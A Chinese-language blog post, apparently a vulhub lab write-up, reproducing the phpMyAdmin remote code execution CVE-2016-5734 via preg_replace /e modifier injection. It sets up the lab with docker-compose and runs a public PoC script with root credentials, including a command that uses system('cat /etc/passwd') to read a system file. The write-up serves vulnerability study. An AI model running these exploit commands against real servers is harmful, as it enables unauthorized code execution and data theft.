PhpMyAdmin远程代码执行(CVE-2016-5734)

环境搭建 漏洞复现 网络安全 vulhub CVE phpmyadmin
漏洞复现
发布日期:   2022-05-11
文章字数:   291
阅读次数:  

PhpMyAdmin远程代码执行

漏洞简述

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞

影响版本

phpmyadmin 4.6.x 版本(直至 4.6.3)

phpmyadmin 4.4.x 版本(直至 4.4.15.7)

phpmyadmin 4.0.x 版本(直至 4.0.10.16)

php版本: 4.3.0 ~5.4.6

环境搭建

cd /vulhub/phpmyadmin/CVE-2016-5734
docker-compose up -d

漏洞测试

我们用大佬写的poc

脚本利用

python 40185.py -u root -p root http://192.168.3.151:8080

image-20220511203322617

默认执行uname

查看一下/etc/passwd

python 40185.py -u root -p root -c "system('cat /etc/passwd')" http://192.168.3.151:8080

image-20220511203531344

结束!!

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/05/11/PhpMyAdmin-Remote-code-Execution/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub CVE phpmyadmin
  目录